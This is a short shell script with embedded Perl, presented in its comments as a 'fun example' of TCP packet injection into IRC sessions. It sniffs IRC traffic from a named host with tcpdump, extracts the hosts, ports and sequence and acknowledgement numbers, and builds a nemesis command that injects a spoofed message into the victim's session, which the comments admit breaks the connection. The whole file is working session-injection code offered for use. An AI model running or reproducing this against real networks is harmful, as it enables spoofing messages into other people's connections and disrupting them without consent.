#!/bin/sh
# Fun example using nemesis to inject a tcp packet.
# 
# What we do is tcpdump for IRC traffic, then change their nickname to
# something very silly.
#
# However, tcp injection severs the connection because the server will
# ACK with the last sequence number, the real client will not understand
# this new sequence number and the connection will be lost.
# 

# What do we need to spoof this?
# source and destination (hosts and ports)
# last sequence number

FILTER="tcp and port 6668 and src host fury.csh.rit.edu";

PERLCODE=`cat <<"CODE"
$|=1;
if (m/^[0-9]{2}:/) {
	@f = split(/\s+/);          # Split up by field 

	$f[1] =~ m/(.+)\.([^.]+)/;  # $1 and $2 are now source host and port
	$srchost = $1; $srcport = $2;

	$f[3] =~ m/(.+)\.([^.]+):/;  # $1 and $2 are now dest host and port
	$dsthost = $1; $dstport = $2;

	$f[5] =~ m/^[0-9]+\:([0-9]+)/; # $1 is the sequence number
	$seqnum = $1;

	# Give up if this is an ACK packet?
	next if ($f[5] eq 'ack');
	print "Seq: $f[5] / $seqnum";

	# Grab the ack seq aswell
	$acknum = $f[7];

	$nemesis = "nemesis tcp -D $dsthost -y $dstport -S $srchost -x $srcport -s $seqnum -a $acknum -fP -fA";
	$payload = "PRIVMSG #foobidyfoo :Hello there!";

	print "\n--------";
	print $_;
	print;
	print "echo \"$payload\" | $nemesis -P -";
	print "\n--------";
}
CODE
`

tcpdump -Sl "$FILTER" | perl -lne "$PERLCODE"